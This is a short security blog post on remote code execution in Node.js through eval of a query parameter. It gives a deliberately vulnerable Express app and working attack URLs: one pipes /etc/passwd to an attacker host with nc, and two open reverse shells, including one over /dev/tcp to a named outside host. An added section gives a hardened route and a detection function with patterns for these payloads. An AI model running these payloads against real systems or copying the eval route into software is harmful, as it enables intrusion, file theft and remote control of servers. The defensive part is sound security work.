
NodeJS RCE

August 20, 2016 • Security

Details

LFI on Demo.PayPal.Com (PayPal file inclusion vulnerability):

http://www.mottoin.com/87659.html

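Test

var express = require('express');
var app = express();
app.get('/', function (req, res) {
    // Deliberately vulnerable: the q query parameter is evaluated as JavaScript
    // inside the server process, and the result is echoed in the response.
    res.send('Hello ' + eval(req.query.q));
    console.log(req.query.q);
});
app.listen(8080, function () {
    console.log('Example listening on port 8080!');
});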

Arbitrary file read

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});  

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/rinige.com/7890 0>%261"')
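
The defensive side of the test route, as an added example that is not part of the original post: `greet()` is a hardened replacement for the `eval` call that treats `q` as data, and `flagRequest()` checks a logged request target for the tokens used in the URLs above. The function names, the pattern list and the character allowlist are assumptions made for illustration.

```javascript
// Added example; greet(), flagRequest() and the pattern list are hypothetical.

// Hardened counterpart of the route body: `q` is treated as data, never code.
// Express can hand back an array or object for req.query.q, so check the type,
// then allowlist characters (res.send() serves strings as text/html).
function greet(q) {
  if (typeof q !== 'string' || !/^[\p{L}\p{N} _.-]{1,64}$/u.test(q)) {
    return { status: 400, body: 'invalid q' };
  }
  return { status: 200, body: 'Hello ' + q };
}

// Tokens that do not belong in a greeting parameter but show up in
// server-side JavaScript injection attempts like the URLs above.
const SUSPICIOUS = [
  ['require-call', /\brequire\s*\(/i],
  ['child_process', /\bchild_process\b/i],
  ['process-object', /\bprocess\s*\./i],
  ['eval-call', /\beval\s*\(/i],
  ['dev-tcp', /\/dev\/tcp\//i],
];

// Decode one request target from an access log and name the patterns that
// match its q parameter. An empty array means nothing was flagged.
function flagRequest(rawTarget) {
  const url = new URL(rawTarget, 'http://placeholder.invalid');
  const q = url.searchParams.get('q');
  if (q === null) return [];
  return SUSPICIOUS.filter(([, re]) => re.test(q)).map(([name]) => name);
}

// Constructed sample targets: one benign, one copied from this page.
const samples = [
  '/?q=World',
  "/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')",
];
for (const target of samples) {
  console.log(target, '->', JSON.stringify(flagRequest(target)));
}
```

In the Express route, `greet(req.query.q)` replaces the `eval` expression and its `status` and `body` go to `res.status(...).send(...)`.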

References

Artsploit
